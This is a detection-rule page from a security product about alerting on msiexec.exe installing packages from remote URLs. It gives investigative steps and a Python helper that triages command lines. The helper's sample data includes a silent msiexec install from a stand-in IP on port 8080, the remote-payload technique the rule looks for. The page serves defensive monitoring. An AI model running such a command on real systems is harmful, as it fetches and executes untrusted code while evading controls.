Synopsis
| Activation Period | 14 Days |
| Training Period | 30 Days |
| Test Period | N/A (single event) |
| Deduplication Period | 7 Days |
| Required Data | |
| Detection Modules | |
| Detector Tags | |
| ATT&CK Tactic | |
| ATT&CK Technique | |
| Severity | Informational |
Description
Msiexec is the command-line utility for the Windows Installer. Adversaries may abuse msiexec.exe to proxy execution of malicious payloads from remote locations.
Attacker's Goals
Evading security controls and executing arbitrary files from the web.
Investigative actions
- Check the msiexec execution and the IP address or domain that was used.
- Check whether the URL that is encoded in the command line is trusted.
- Check whether the executed DLL or MSI file is known to be legitimate.
- Check whether the initiating process is legitimate and whether the user running it knows of its use.
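
As an added example (not part of the original page and not the product's detection logic), the Python helper below extracts the facts these investigative actions ask for from a process command line: the remote host, its port, and any NAME=value arguments. The trusted-host list, the sample command lines, and the reading of "properties" as NAME=value arguments are assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts your organization trusts for MSI delivery (constructed value).
TRUSTED_HOSTS = {"downloads.corp.example"}

MSIEXEC_RE = re.compile(r'(?i)(?:^|[\\/"\s])msiexec(?:\.exe)?(?=["\s]|$)')
URL_RE = re.compile(r'(?i)https?://[^\s"]+')
PROP_RE = re.compile(r'([A-Za-z_][A-Za-z0-9_.]*)=')  # NAME=value argument
IPV4_RE = re.compile(r'\d{1,3}(?:\.\d{1,3}){3}')

def triage_msiexec(cmdline):
    """Return triage facts for an msiexec command line that references a URL, else None."""
    url_match = URL_RE.search(cmdline)
    if not MSIEXEC_RE.search(cmdline) or not url_match:
        return None
    try:
        url = urlsplit(url_match.group(0))
        port = url.port
    except ValueError:  # malformed host or port: surface it rather than drop the event
        return {"url": url_match.group(0), "malformed_url": True}
    default_port = 443 if url.scheme == "https" else 80
    host = url.hostname or ""
    # Look for NAME=value arguments outside the URL, so query strings are not counted.
    tokens = URL_RE.sub(" ", cmdline).replace('"', " ").split()
    props = [m.group(1).upper() for m in map(PROP_RE.match, tokens) if m]
    return {
        "url": url_match.group(0),
        "host": host,
        "port": port or default_port,
        "nondefault_port": port not in (None, default_port),
        "ip_literal_host": bool(IPV4_RE.fullmatch(host)) or ":" in host,
        "trusted_host": host in TRUSTED_HOSTS,
        "properties": props,
    }

# Constructed process command lines (documentation-range IP and example domain).
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\msiexec.exe" /q /i http://203.0.113.10:8080/setup.msi',
    r'msiexec /i https://downloads.corp.example/agent.msi /qn INSTALLDIR="C:\Agent"',
    r'msiexec.exe /i C:\Temp\local.msi /qn',
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(line, "->", triage_msiexec(line))
```

An IP-literal host, a non-default port, or an untrusted host in the result are the items to follow up first; a local-path install returns `None` because it is outside this alert's scope.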
Variations
- Msiexec execution of an executable from an uncommon remote location with a specific port
- Msiexec execution of an executable from an uncommon remote location without properties